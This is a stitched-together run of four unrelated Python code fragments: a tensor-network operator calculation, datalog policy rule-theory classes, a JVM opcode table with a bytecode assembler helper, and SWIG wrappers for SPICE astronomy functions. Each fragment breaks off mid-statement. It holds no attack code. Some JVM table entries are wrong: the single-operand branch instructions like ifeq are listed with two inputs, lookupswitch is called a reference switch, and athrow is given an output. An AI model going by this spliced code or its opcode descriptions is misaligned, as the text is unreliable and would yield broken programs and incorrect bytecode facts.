right_bmpo[row*2,row*2+1,row*2+2,row*2+3], hermitian=hermitian, positive=positive, in_mem=in_mem, reduced=reduced) return res def calc_local_nn_op_lb(mpo,bra,ket,top,bot,left,right,normalize=True,contracted_env=False,chi=10): """ Calculate the value of an operator as an mpo acting on the left and bottom bonds of a 2x2 peps grid """ # Check if it is a thermal state: thermal = len(bra[0][1].legs[2]) == 2 # Absorb MPO into bra Hbra = [[None,None],[None,None]] if thermal: bra[0][1].unmerge_ind(2) Hbra[0][1] = einsum('ldparu,pPx->ldxParu',bra[0][1],mpo[0]) # Top left site Hbra[0][1].merge_inds([1,2]) Hbra[0][1].merge_inds([2,3]) bra[0][1].merge_inds([2,3]) bra[0][0].unmerge_ind(2) Hbra[0][0] = einsum('ldparu,xpPy->ldParyux',bra[0][0],mpo[1]) # Bottom left site Hbra[0][0].merge_inds([2,3]) Hbra[0][0].merge_inds([3,4]) Hbra[0][0].merge_inds([4,5]) bra[0][0].merge_inds([2,3]) bra[1][0].unmerge_ind(2) Hbra[1][0] = einsum('ldparu,ypP->lydParu',bra[1][0],mpo[2]) # Bottom right site Hbra[1][0].merge_inds([0,1]) Hbra[1][0].merge_inds([2,3]) Hbra[1][1] = bra[1][1].copy() bra[1][0].merge_inds([2,3]) else: Hbra[0][1] = einsum('ldpru,pPx->ldxPru',bra[0][1],mpo[0]) # Top left site Hbra[0][1].merge_inds([1,2]) Hbra[0][0] = einsum('ldpru,xpPy->ldPryux',bra[0][0],mpo[1]) # Bottom left site Hbra[0][0].merge_inds([3,4]) Hbra[0][0].merge_inds([4,5]) Hbra[1][0] =
rules with that table in head self.contents = {} if rules is not None: for rule in rules: self.insert(rule) ############### External Interface ############### # SELECT implemented by TopDownTheory def insert(self, rule): changes = self.update([Event(formula=rule, insert=True)]) return [event.formula for event in changes] def delete(self, rule): changes = self.update([Event(formula=rule, insert=False)]) return [event.formula for event in changes] def update(self, events): """Apply EVENTS and return the list of EVENTS that actually changed the theory. Each event is the insert or delete of a policy statement. """ changes = [] self.log(None, "Update " + iterstr(events)) for event in events: if event.insert: if self.insert_actual(event.formula): changes.append(event) else: if self.delete_actual(event.formula): changes.append(event) return changes def update_would_cause_errors(self, events): """Return a list of compile.CongressException if we were to apply the insert/deletes of policy statements dictated by EVENTS to the current policy. """ self.log(None, "update_would_cause_errors " + iterstr(events)) errors = [] current = set(self.policy()) for event in events: if not compile.is_datalog(event.formula): errors.append(compile.CongressException( "Non-formula found: {}".format( str(event.formula)))) else: if event.formula.is_atom(): errors.extend(compile.fact_errors(event.formula)) else: errors.extend(compile.rule_errors(event.formula)) if event.insert: current.add(event.formula) else: current.remove(event.formula) if compile.is_recursive(current): errors.append(compile.CongressException( "Rules are recursive")) return errors def define(self, rules): """Empties and then inserts RULES. """ self.empty() return self.update([Event(formula=rule, insert=True) for rule in rules]) def empty(self): """Deletes contents of theory. """ self.contents = {} def policy(self): return self.content() def get_arity_self(self, tablename): if tablename not in self.contents: return None if len(self.contents[tablename]) == 0: return None return len(self.contents[tablename][0].head.arguments) ############### Internal Interface ############### def insert_actual(self, rule): """Insert RULE and return True if there was a change. """ if compile.is_atom(rule): rule = compile.Rule(rule, [], rule.location) self.log(rule.head.table, "Insert: {}".format(str(rule))) table = rule.head.table if table in self.contents: if rule not in self.contents[table]: # eliminate dups self.contents[table].append(rule) return True return False else: self.contents[table] = [rule] return True def delete_actual(self, rule): """Delete RULE and return True if there was a change. """ if compile.is_atom(rule): rule = compile.Rule(rule, [], rule.location) self.log(rule.head.table, "Delete: {}".format(str(rule))) table = rule.head.table if table in self.contents: try: self.contents[table].remove(rule) return True except ValueError: return False return False def content(self, tablenames=None): if tablenames is None: tablenames = self.contents.keys() results = [] for table in tablenames: results.extend(self.contents[table]) return results class ActionTheory(NonrecursiveRuleTheory): """Same as NonrecursiveRuleTheory except it has fewer constraints on the permitted rules. Still working out the details. """ def update_would_cause_errors(self, events): """Return a list of compile.CongressException if we were to apply the events EVENTS to the current policy. """ self.log(None, "update_would_cause_errors " + iterstr(events)) errors = [] current = set(self.policy()) for event in events: if not compile.is_datalog(event.formula): errors.append(compile.CongressException( "Non-formula found: {}".format( str(event.formula)))) else: if event.formula.is_atom(): errors.extend(compile.fact_errors(event.formula)) else: pass # Should put this back in place, but there are some # exceptions that we don't handle right now. # Would like to mark some tables as only being defined # for certain bound/free arguments and take that into # account when doing error checking. #errors.extend(compile.rule_negation_safety(event.formula)) if event.insert: current.add(event.formula) else: current.remove(event.formula) if compile.is_recursive(current): errors.append(compile.CongressException( "Rules are recursive")) return errors class DeltaRuleTheory (Theory): """A collection of DeltaRules. Not useful by itself as a policy.""" def __init__(self, name=None, abbr=None): super(DeltaRuleTheory, self).__init__(name=name, abbr=abbr) # dictionary from table name to list of rules with that table as # trigger self.contents = {} # dictionary from delta_rule to the rule from which it was derived self.originals = set() # dictionary from table name to number of rules with that table in # head self.views = {} # all tables self.all_tables = {} def modify(self, event): """Insert/delete the compile.Rule RULE into the theory. Return list of changes (either the empty list or a list including just RULE). """ self.log(None, "DeltaRuleTheory.modify " + str(event.formula)) self.log(None, "originals: " + iterstr(self.originals)) if event.insert: if self.insert(event.formula): return [event] else: if self.delete(event.formula): return [event] return [] def insert(self, rule): """Insert a compile.Rule into the theory. Return True iff the theory changed. """ assert compile.is_regular_rule(rule), \ "DeltaRuleTheory only takes rules" self.log(rule.tablename(), "Insert: {}".format(str(rule))) if rule in self.originals: self.log(None, iterstr(self.originals)) return False self.log(rule.tablename(), "Insert 2: {}".format(str(rule))) for delta in self.compute_delta_rules([rule]): self.reorder(delta) self.insert_delta(delta) self.originals.add(rule) return True def insert_delta(self, delta): """Insert a delta rule.""" self.log(None, "Inserting delta rule {}".format(str(delta))) # views (tables occurring in head) if delta.head.table in self.views: self.views[delta.head.table] += 1 else: self.views[delta.head.table] = 1 # tables for table in delta.tablenames(): if table in self.all_tables: self.all_tables[table] += 1 else: self.all_tables[table] = 1 # contents # TODO(thinrichs): eliminate dups, maybe including # case where bodies are reorderings of each other if delta.trigger.table not in self.contents: self.contents[delta.trigger.table] = [delta] else: self.contents[delta.trigger.table].append(delta) def delete(self, rule): """Delete a compile.Rule from theory. Assumes that COMPUTE_DELTA_RULES is deterministic. Returns True iff the theory changed. """ self.log(rule.tablename(), "Delete: {}".format(str(rule))) if rule not in self.originals: return False for delta in self.compute_delta_rules([rule]): self.delete_delta(delta) self.originals.remove(rule) return True def delete_delta(self, delta): """Delete the DeltaRule DELTA from the theory.""" # views if delta.head.table in self.views: self.views[delta.head.table] -= 1 if self.views[delta.head.table] == 0: del self.views[delta.head.table] # tables for table in delta.tablenames(): if table in self.all_tables: self.all_tables[table] -= 1 if self.all_tables[table] == 0: del self.all_tables[table] # contents if delta.trigger.table not in self.contents: return self.contents[delta.trigger.table].remove(delta) def policy(self): return self.originals def get_arity_self(self, tablename): for p in self.originals: if p.head.table == tablename: return len(p.head.arguments) return None def __str__(self): return str(self.contents) def rules_with_trigger(self, table): """Return the list of DeltaRules that trigger on the given TABLE.""" if table not in self.contents: return [] else: return self.contents[table] def is_view(self, x): return x in self.views def is_known(self, x): return x in self.all_tables def base_tables(self): base = [] for table in self.all_tables: if table not in self.views: base.append(table) return base @classmethod def eliminate_self_joins(cls, formulas): """Return new list of formulas that is equivalent to the list of formulas FORMULAS except that there are no self-joins. """ def new_table_name(name, arity, index): return "___{}_{}_{}".format(name, arity, index) def n_variables(n): vars = [] for i in xrange(0, n): vars.append("x" + str(i)) return vars # dict from (table name, arity) tuple to # max num of occurrences of self-joins in any rule global_self_joins = {} # remove self-joins from rules results = [] for rule in formulas: if rule.is_atom(): results.append(rule) continue logging.debug("eliminating self joins from {}".format(rule)) occurrences = {} # for just this rule for atom in rule.body: table = atom.table arity = len(atom.arguments) tablearity = (table, arity) if tablearity not in occurrences: occurrences[tablearity] = 1 else: # change name of atom atom.table = new_table_name(table, arity, occurrences[tablearity]) # update our counters occurrences[tablearity] += 1 if tablearity not in global_self_joins: global_self_joins[tablearity] = 1 else: global_self_joins[tablearity] = \ max(occurrences[tablearity] - 1, global_self_joins[tablearity]) results.append(rule) logging.debug("final rule: {}".format(str(rule))) # add definitions for new tables for tablearity in global_self_joins: table = tablearity[0] arity = tablearity[1] for i in xrange(1, global_self_joins[tablearity] + 1): newtable = new_table_name(table, arity, i) args = [compile.Variable(var) for var in n_variables(arity)] head = compile.Literal(newtable, args) body = [compile.Literal(table, args)] results.append(compile.Rule(head, body)) logging.debug("Adding rule {}".format(results[-1])) return results @classmethod def compute_delta_rules(cls, formulas): """Assuming FORMULAS has no self-joins, return a list of DeltaRules derived from those FORMULAS. """ # Should do the following for correctness, but it needs to be # done elsewhere so that we can properly maintain the tables # that are generated. # formulas = cls.eliminate_self_joins(formulas) delta_rules = [] for rule in formulas: if rule.is_atom(): continue for literal in rule.body: newbody = [lit for lit in rule.body if lit is not literal] delta_rules.append( DeltaRule(literal, rule.head, newbody, rule)) return delta_rules @classmethod def reorder(cls, delta): """Given a delta rule DELTA, re-order its body for efficient and correct computation. """ # ensure negatives come after positives positives = [lit for lit in delta.body if not lit.is_negated()] negatives = [lit for lit in delta.body if lit.is_negated()] positives.extend(negatives) delta.body = positives class MaterializedViewTheory(TopDownTheory): """A theory that stores the table contents of views explicitly. Relies on included theories to define the contents of those tables not defined by the rules of the theory. Recursive rules are allowed. """ def __init__(self, name=None, abbr=None): super(MaterializedViewTheory, self).__init__(name=name, abbr=abbr) # queue of events left to process self.queue = EventQueue() # data storage db_name = None db_abbr = None delta_name =
"name": "lcmp", "description": "Compare two longs", "inputs": [OperandType.Long, OperandType.Long], "outputs": [OperandType.Integer], }, 0x95: { "name": "fcmpl", "description": "Compare two floats", "inputs": [OperandType.Float, OperandType.Float], "outputs": [OperandType.Integer], }, 0x96: { "name": "fcmpg", "description": "Compare two floats", "inputs": [OperandType.Float, OperandType.Float], "outputs": [OperandType.Integer], }, 0x97: { "name": "dcmpl", "description": "Compare two doubles", "inputs": [OperandType.Double, OperandType.Double], "outputs": [OperandType.Integer], }, 0x98: { "name": "dcmpg", "description": "Compare two doubles", "inputs": [OperandType.Double, OperandType.Double], "outputs": [OperandType.Integer], }, 0x99: { "name": "ifeq", "description": "If the first value is equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0x9a: { "name": "ifne", "description": "If the first value is not equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0x9b: { "name": "iflt", "description": "If the first value is less than the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0x9c: { "name": "ifge", "description": "If the first value is greater than or equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0x9d: { "name": "ifgt", "description": "If the first value is greater than the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0x9e: { "name": "ifle", "description": "If the first value is less than or equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0x9f: { "name": "if_icmpeq", "description": "If the first value is equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0xa0: { "name": "if_icmpne", "description": "If the first value is not equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0xa1: { "name": "if_icmplt", "description": "If the first value is less than the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0xa2: { "name": "if_icmpge", "description": "If the first value is greater than or equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0xa3: { "name": "if_icmpgt", "description": "If the first value is greater than the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0xa4: { "name": "if_icmple", "description": "If the first value is less than or equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0xa5: { "name": "if_acmpeq", "description": "If the first value is equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0xa6: { "name": "if_acmpne", "description": "If the first value is not equal to the second, branch to the specified address", "inputs": [OperandType.Integer, OperandType.Integer], "outputs": [], }, 0xa7: { "name": "goto", "description": "Branch to the specified address", "inputs": [], "outputs": [], }, 0xa8: { "name": "jsr", "description": "Jump to subroutine and save return address", "inputs": [], "outputs": [OperandType.Reference], }, 0xa9: { "name": "ret", "description": "Return from subroutine", "inputs": [], "outputs": [], }, 0xaa: { "name": "tableswitch", "description": "Switch on an integer value", "inputs": [OperandType.Integer], "outputs": [], }, 0xab: { "name": "lookupswitch", "description": "Switch on a reference value", "inputs": [OperandType.Integer], "outputs": [], }, 0xac: { "name": "ireturn", "description": "Return an integer value from a method", "inputs": [OperandType.Integer], "outputs": [], }, 0xad: { "name": "lreturn", "description": "Return a long value from a method", "inputs": [OperandType.Long], "outputs": [], }, 0xae: { "name": "freturn", "description": "Return a float value from a method", "inputs": [OperandType.Float], "outputs": [], }, 0xaf: { "name": "dreturn", "description": "Return a double value from a method", "inputs": [OperandType.Double], "outputs": [], }, 0xb0: { "name": "areturn", "description": "Return an object reference from a method", "inputs": [OperandType.Reference], "outputs": [], }, 0xb1: { "name": "return", "description": "Return void from method", "inputs": [], "outputs": [], }, 0xb2: { "name": "getstatic", "description": "Get a static field value", "inputs": [], "outputs": get_field_type, }, 0xb3: { "name": "putstatic", "description": "Set a static field value", "inputs": get_field_type, "outputs": [], }, 0xb4: { "name": "getfield", "description": "Get a field value", "inputs": [], "outputs": get_field_type, }, 0xb5: { "name": "putfield", "description": "Set a field value", "inputs": get_field_type, "outputs": [], }, 0xb6: { "name": "invokevirtual", "description": "Invoke a virtual method on an object", "inputs": instance_method_input_types, "outputs": get_method_return_type, }, 0xb7: { "name": "invokespecial", "description": "Invoke a special method on an object", "inputs": instance_method_input_types, "outputs": get_method_return_type, }, 0xb8: { "name": "invokestatic", "description": "Invoke a static method", "inputs": get_method_input_types, "outputs": get_method_return_type, }, 0xb9: { "name": "invokeinterface", "description": "Invoke an interface method on an object", "inputs": instance_method_input_types, "outputs": get_method_return_type, }, 0xba: { "name": "invokedynamic", "description": "Invoke a dynamic method", "inputs": get_method_input_types, "outputs": get_method_return_type, }, 0xbb: { "name": "new", "description": "Create a new object", "inputs": [], "outputs": [OperandType.Reference], }, 0xbc: { "name": "newarray", "description": "Create a new array", "inputs": [OperandType.Integer], "outputs": [OperandType.Reference], }, 0xbd: { "name": "anewarray", "description": "Create a new array of references", "inputs": [], "outputs": [OperandType.Reference], }, 0xbe: { "name": "arraylength", "description": "Get the length of an array", "inputs": [OperandType.Reference], "outputs": [OperandType.Integer], }, 0xbf: { "name": "athrow", "description": "Throw an exception or error", "inputs": [OperandType.Reference], "outputs": [OperandType.Reference], }, 0xc0: { "name": "checkcast", "description": "Check if an object is of a certain type", "inputs": [OperandType.Reference], "outputs": [OperandType.Reference], }, 0xc1: { "name": "instanceof", "description": "Check if an object is of a certain type", "inputs": [OperandType.Reference], "outputs": [OperandType.Integer], }, 0xc2: { "name": "monitorenter", "description": "Enter monitor for an object", "inputs": [OperandType.Reference], "outputs": [], }, 0xc3: { "name": "monitorexit", "description": "Exit monitor for an object", "inputs": [OperandType.Reference], "outputs": [], }, 0xc4: { "name": "wide", "description": "Execute a wide instruction", "inputs": [], "outputs": [], }, 0xc5: { "name": "multianewarray", "description": "Create a new multi-dimensional array", "inputs": [], "outputs": [OperandType.Reference], }, 0xc6: { "name": "ifnull", "description": "Jump if value is null", "inputs": [OperandType.Reference], "outputs": [], }, 0xc7: { "name": "ifnonnull", "description": "Jump if value is not null", "inputs": [OperandType.Reference], "outputs": [], }, 0xc8: { "name": "goto_w", "description": "Jump to a new location in the code", "inputs": [], "outputs": [], }, 0xc9: { "name": "jsr_w", "description": "Jump to a new location in the code", "inputs": [], "outputs": [OperandType.Reference], }, 0xca: { "name": "breakpoint", "description": "Execute a breakpoint instruction", "inputs": [], "outputs": [], }, 0xfe: { "name": "impdep1", "description": "Implementation-dependent instruction", "inputs": [], "outputs": [], }, 0xff: { "name": "impdep2", "description": "Implementation-dependent instruction", "inputs": [], "outputs": [], }, } # </editor-fold> INSTRUCTIONS = dict(map(lambda item: (item[0], InstructionInfo(**item[1])), INSTRUCTIONS.items())) INSTRUCTIONS_BY_NAME: Dict[str, InstructionInfo] = dict(map(lambda item: (item[1].name, item[1]), INSTRUCTIONS.items())) class Instructions(object): _context: GenerateContext _instructions: Deque[InstructionsType] _stack: Stack def __init__(self, context: GenerateContext): self._instructions = deque() self._stack = Stack() self._context = context @property def instructions(self): return self._instructions.copy() @property def stack(self): return self._stack @staticmethod def _map_label(label: LabelType) -> Label: if isinstance(label, Label): return label else: return Label(label) def assemble(self) -> List[AssemblyInstruction]: return assemble(self._instructions) def append(self, instruction: Instruction, *operands: Operand) -> 'Instructions': if isinstance(instruction, Label): self._instructions.append(instruction) else: self._instructions.append((instruction, *operands)) self._stack.update_stack(instruction, *operands) return self def end_branch(self): self._stack.restore_stack() return self def else_branch(self): pass def label(self, name: LabelType) -> 'Instructions': return self.append(self._map_label(name)) def push_constant(self, constant: Constant) -> 'Instructions': if constant.index <= 255: self.append("ldc", constant) else: self.append("ldc_w", constant) return self def push_long(self, long: int) -> 'Instructions': if long == 0: self.append("lconst_0") elif long == 1: self.append("lconst_1") elif long in range(-128, 128): self.append("bipush", long) self.append("i2l") elif long in range(-32768, 32768): self.append("sipush", long) self.append("i2l") elif long in range(-2147483648, 2147483648): self.push_constant(self._context.cf.constants.create_integer(long)) self.append("i2l") elif long in range(-9223372036854775808, 9223372036854775808): self.append("ldc2_w", self._context.cf.constants.create_long(long)) else: raise ValueError(f"{long} greater than MAX_LONG") return self def push_integer(self, integer: int) -> 'Instructions': if integer < -32768: self.push_constant(self._context.cf.constants.create_integer(integer)) elif integer < -128: self.append("sipush", integer) elif integer < -1: self.append("bipush", integer) elif integer == -1: self.append("iconst_m1") elif integer <= 5: self.append(f"iconst_{integer}") elif integer <= 127: self.append("bipush", integer) elif integer <= 32767: self.append("sipush", integer) elif integer <= 2147483647: self.push_constant(self._context.cf.constants.create_integer(integer)) else: raise ValueError(f"{integer} greater than MAX_INT") return self def push_null(self): return self.append("aconst_null") # <editor-fold desc="Drops/Pops" defaultstate="collapsed" defaultstate="collapsed"> def pop(self) -> 'Instructions': return self.append("pop") def pop2(self) -> 'Instructions': return self.append("pop2") def drop(self) -> 'Instructions': return self.pop() def drop_long(self): return
ConstSpiceChar * str2, ConstSpiceChar * str3, ConstSpiceChar * str4)""" return _cspyce0.spkezr_vector(str1, in11, str2, str3, str4) def spkgeo(targ, et, CONST_STRING, obs): """spkgeo(SpiceInt targ, SpiceDouble et, ConstSpiceChar * CONST_STRING, SpiceInt obs)""" return _cspyce0.spkgeo(targ, et, CONST_STRING, obs) def spkgeo_vector(k1, in11, str1, k2): """spkgeo_vector(SpiceInt k1, ConstSpiceDouble * in11, ConstSpiceChar * str1, SpiceInt k2)""" return _cspyce0.spkgeo_vector(k1, in11, str1, k2) def spkgps(targ, et, CONST_STRING, obs): """spkgps(SpiceInt targ, SpiceDouble et, ConstSpiceChar * CONST_STRING, SpiceInt obs)""" return _cspyce0.spkgps(targ, et, CONST_STRING, obs) def spkgps_vector(k1, in11, str1, k2): """spkgps_vector(SpiceInt k1, ConstSpiceDouble * in11, ConstSpiceChar * str1, SpiceInt k2)""" return _cspyce0.spkgps_vector(k1, in11, str1, k2) def spkltc(targ, et, arg3, arg4, stobs): """spkltc(SpiceInt targ, SpiceDouble et, ConstSpiceChar * arg3, ConstSpiceChar * arg4, ConstSpiceDouble [6] stobs)""" return _cspyce0.spkltc(targ, et, arg3, arg4, stobs) def spkltc_vector(k1, in11, str1, str2, in21): """spkltc_vector(SpiceInt k1, ConstSpiceDouble * in11, ConstSpiceChar * str1, ConstSpiceChar * str2, ConstSpiceDouble * in21)""" return _cspyce0.spkltc_vector(k1, in11, str1, str2, in21) def spkobj(spk): """spkobj(ConstSpiceChar * spk)""" return _cspyce0.spkobj(spk) def spkpos(arg1, et, arg3, arg4, arg5): """spkpos(ConstSpiceChar * arg1, SpiceDouble et, ConstSpiceChar * arg3, ConstSpiceChar * arg4, ConstSpiceChar * arg5)""" return _cspyce0.spkpos(arg1, et, arg3, arg4, arg5) def spkpos_vector(str1, in11, str2, str3, str4): """spkpos_vector(ConstSpiceChar * str1, ConstSpiceDouble * in11, ConstSpiceChar * str2, ConstSpiceChar * str3, ConstSpiceChar * str4)""" return _cspyce0.spkpos_vector(str1, in11, str2, str3, str4) def spkssb(targ, et, CONST_STRING): """spkssb(SpiceInt targ, SpiceDouble et, ConstSpiceChar * CONST_STRING)""" return _cspyce0.spkssb(targ, et, CONST_STRING) def spkssb_vector(k1, in11, str1): """spkssb_vector(SpiceInt k1, ConstSpiceDouble * in11, ConstSpiceChar * str1)""" return _cspyce0.spkssb_vector(k1, in11, str1) def srfc2s(code, bodyid): """srfc2s(SpiceInt code, SpiceInt bodyid)""" return _cspyce0.srfc2s(code, bodyid) def srfcss(code, CONST_STRING): """srfcss(SpiceInt code, ConstSpiceChar * CONST_STRING)""" return _cspyce0.srfcss(code, CONST_STRING) def srfnrm(method, target, et, fixref, npts): """srfnrm(ConstSpiceChar * method, ConstSpiceChar * target, SpiceDouble et, ConstSpiceChar * fixref, SpiceInt npts)""" return _cspyce0.srfnrm(method, target, et, fixref, npts) def srfrec(body, longitude, latitude): """srfrec(SpiceInt body, SpiceDouble longitude, SpiceDouble latitude)""" return _cspyce0.srfrec(body, longitude, latitude) def srfrec_vector(k1, in11, in12): """srfrec_vector(SpiceInt k1, ConstSpiceDouble * in11, ConstSpiceDouble * in12)""" return _cspyce0.srfrec_vector(k1, in11, in12) def srfs2c(arg1, arg2): """srfs2c(ConstSpiceChar * arg1, ConstSpiceChar * arg2)""" return _cspyce0.srfs2c(arg1, arg2) def srfscc(CONST_STRING, body_id): """srfscc(ConstSpiceChar * CONST_STRING, SpiceInt body_id)""" return _cspyce0.srfscc(CONST_STRING, body_id) def srfxpt(arg1, arg2, et, arg4, arg5, arg6, dvec): """srfxpt(ConstSpiceChar * arg1, ConstSpiceChar * arg2, SpiceDouble et, ConstSpiceChar * arg4, ConstSpiceChar * arg5, ConstSpiceChar * arg6, ConstSpiceDouble [3] dvec)""" return _cspyce0.srfxpt(arg1, arg2, et, arg4, arg5, arg6, dvec) def srfxpt_vector(str1, str2, in11, str3, str4, str5, in21): """srfxpt_vector(ConstSpiceChar * str1, ConstSpiceChar * str2, ConstSpiceDouble * in11, ConstSpiceChar * str3, ConstSpiceChar * str4, ConstSpiceChar * str5, ConstSpiceDouble * in21)""" return _cspyce0.srfxpt_vector(str1, str2, in11, str3, str4, str5, in21) def stcf01(catnam, westra, eastra, sthdec, nthdec): """stcf01(ConstSpiceChar * catnam, SpiceDouble westra, SpiceDouble eastra, SpiceDouble sthdec, SpiceDouble nthdec)""" return _cspyce0.stcf01(catnam, westra, eastra, sthdec, nthdec) def stcg01(index): """stcg01(SpiceInt index)""" return _cspyce0.stcg01(index) def stcl01(catfnm): """stcl01(ConstSpiceChar * catfnm)""" return _cspyce0.stcl01(catfnm) def stelab(pobj, vobs): """stelab(ConstSpiceDouble [3] pobj, ConstSpiceDouble [3] vobs)""" return _cspyce0.stelab(pobj, vobs) def stelab_vector(in21, in22): """stelab_vector(ConstSpiceDouble * in21, ConstSpiceDouble * in22)""" return _cspyce0.stelab_vector(in21, in22) def stlabx(pobj, vobs): """stlabx(ConstSpiceDouble [3] pobj, ConstSpiceDouble [3] vobs)""" return _cspyce0.stlabx(pobj, vobs) def stlabx_vector(in21, in22): """stlabx_vector(ConstSpiceDouble * in21, ConstSpiceDouble * in22)""" return _cspyce0.stlabx_vector(in21, in22) def stpool(item, nth, contin): """stpool(ConstSpiceChar * item, SpiceInt nth, ConstSpiceChar * contin)""" return _cspyce0.stpool(item, nth, contin) def str2et(CONST_STRING): """str2et(ConstSpiceChar * CONST_STRING)""" return _cspyce0.str2et(CONST_STRING) def subpnt(arg1, arg2, et, arg4, arg5, arg6): """subpnt(ConstSpiceChar * arg1, ConstSpiceChar * arg2, SpiceDouble et, ConstSpiceChar * arg4, ConstSpiceChar * arg5, ConstSpiceChar * arg6)""" return _cspyce0.subpnt(arg1, arg2, et, arg4, arg5, arg6) def subpnt_vector(str1, str2, in11, str3, str4, str5): """subpnt_vector(ConstSpiceChar * str1, ConstSpiceChar * str2, ConstSpiceDouble * in11, ConstSpiceChar * str3, ConstSpiceChar * str4, ConstSpiceChar * str5)""" return _cspyce0.subpnt_vector(str1, str2, in11, str3, str4, str5) def subpt(arg1, arg2, et, arg4, arg5): """subpt(ConstSpiceChar * arg1, ConstSpiceChar * arg2, SpiceDouble et, ConstSpiceChar * arg4, ConstSpiceChar * arg5)""" return _cspyce0.subpt(arg1, arg2, et, arg4, arg5) def subpt_vector(str1, str2, in11, str3, str4): """subpt_vector(ConstSpiceChar * str1, ConstSpiceChar * str2, ConstSpiceDouble * in11, ConstSpiceChar * str3, ConstSpiceChar * str4)""" return _cspyce0.subpt_vector(str1, str2, in11, str3, str4) def subslr(arg1, arg2, et, arg4, arg5, arg6): """subslr(ConstSpiceChar * arg1, ConstSpiceChar * arg2, SpiceDouble et, ConstSpiceChar * arg4, ConstSpiceChar * arg5, ConstSpiceChar * arg6)""" return _cspyce0.subslr(arg1, arg2, et, arg4, arg5, arg6) def subslr_vector(str1, str2, in11, str3, str4, str5): """subslr_vector(ConstSpiceChar * str1, ConstSpiceChar * str2, ConstSpiceDouble * in11, ConstSpiceChar * str3, ConstSpiceChar * str4, ConstSpiceChar * str5)""" return _cspyce0.subslr_vector(str1, str2, in11, str3, str4, str5) def subsol(arg1, arg2, et, arg4, arg5): """subsol(ConstSpiceChar * arg1, ConstSpiceChar * arg2, SpiceDouble et, ConstSpiceChar * arg4, ConstSpiceChar * arg5)""" return _cspyce0.subsol(arg1, arg2, et, arg4, arg5) def subsol_vector(str1, str2, in11, str3, str4): """subsol_vector(ConstSpiceChar * str1, ConstSpiceChar * str2, ConstSpiceDouble * in11, ConstSpiceChar * str3, ConstSpiceChar * str4)""" return _cspyce0.subsol_vector(str1, str2, in11, str3, str4) def surfnm(a, b, c, point): """surfnm(SpiceDouble a, SpiceDouble b, SpiceDouble c, ConstSpiceDouble [3] point)""" return _cspyce0.surfnm(a, b, c, point) def surfpt(positn, u, a, b, c): """surfpt(ConstSpiceDouble [3] positn, ConstSpiceDouble [3] u, SpiceDouble a, SpiceDouble b, SpiceDouble c)""" return _cspyce0.surfpt(positn, u, a, b, c) def surfpt_vector(in21, in22, in11, in12, in13): """surfpt_vector(ConstSpiceDouble * in21, ConstSpiceDouble * in22, ConstSpiceDouble * in11, ConstSpiceDouble * in12, ConstSpiceDouble * in13)""" return _cspyce0.surfpt_vector(in21, in22, in11, in12, in13) def surfpv(stvrtx, stdir, a, b, c): """surfpv(ConstSpiceDouble [6] stvrtx, ConstSpiceDouble [6] stdir, SpiceDouble a, SpiceDouble b, SpiceDouble c)""" return _cspyce0.surfpv(stvrtx, stdir, a, b, c) def surfpv_vector(in21, in22, in11, in12, in13): """surfpv_vector(ConstSpiceDouble * in21, ConstSpiceDouble * in22, ConstSpiceDouble * in11, ConstSpiceDouble * in12, ConstSpiceDouble * in13)""" return _cspyce0.surfpv_vector(in21, in22, in11, in12, in13) def sxform(arg1, arg2, et): """sxform(ConstSpiceChar * arg1, ConstSpiceChar * arg2, SpiceDouble et)""" return _cspyce0.sxform(arg1, arg2, et) def sxform_vector(str1, str2, in11): """sxform_vector(ConstSpiceChar * str1, ConstSpiceChar * str2, ConstSpiceDouble * in11)""" return _cspyce0.sxform_vector(str1, str2, in11) def termpt(method, ilusrc, target, et, fixref, abcorr, corloc, obsrvr, refvec, rolstp, ncuts, schstp, soltol, maxn): """termpt(ConstSpiceChar * method, ConstSpiceChar * ilusrc, ConstSpiceChar * target, SpiceDouble et, ConstSpiceChar * fixref, ConstSpiceChar * abcorr, ConstSpiceChar * corloc, ConstSpiceChar * obsrvr, ConstSpiceDouble [3] refvec, SpiceDouble rolstp, SpiceInt ncuts, SpiceDouble schstp, SpiceDouble soltol, SpiceInt maxn)""" return _cspyce0.termpt(method, ilusrc, target, et, fixref, abcorr, corloc, obsrvr, refvec, rolstp, ncuts, schstp, soltol, maxn) def timdef(arg1, arg2, lenout): """timdef(ConstSpiceChar * arg1, ConstSpiceChar * arg2, SpiceInt lenout)""" return _cspyce0.timdef(arg1, arg2, lenout) def timout(et, CONST_STRING): """timout(SpiceDouble et, ConstSpiceChar * CONST_STRING)""" return _cspyce0.timout(et, CONST_STRING) def tipbod(CONST_STRING, body, et): """tipbod(ConstSpiceChar * CONST_STRING, SpiceInt body, SpiceDouble et)""" return _cspyce0.tipbod(CONST_STRING, body, et) def tipbod_vector(str1, k1, in11): """tipbod_vector(ConstSpiceChar * str1, SpiceInt k1, ConstSpiceDouble * in11)""" return _cspyce0.tipbod_vector(str1, k1, in11) def tisbod(CONST_STRING, body, et): """tisbod(ConstSpiceChar * CONST_STRING, SpiceInt body, SpiceDouble et)""" return _cspyce0.tisbod(CONST_STRING, body, et) def tisbod_vector(str1, k1, in11): """tisbod_vector(ConstSpiceChar * str1, SpiceInt k1, ConstSpiceDouble * in11)""" return _cspyce0.tisbod_vector(str1, k1, in11) def tkvrsn(CONST_STRING): """tkvrsn(ConstSpiceChar * CONST_STRING) -> char *""" return _cspyce0.tkvrsn(CONST_STRING) def tparse(string): """tparse(ConstSpiceChar * string)""" return _cspyce0.tparse(string) def tpictr(sample): """tpictr(ConstSpiceChar * sample)""" return 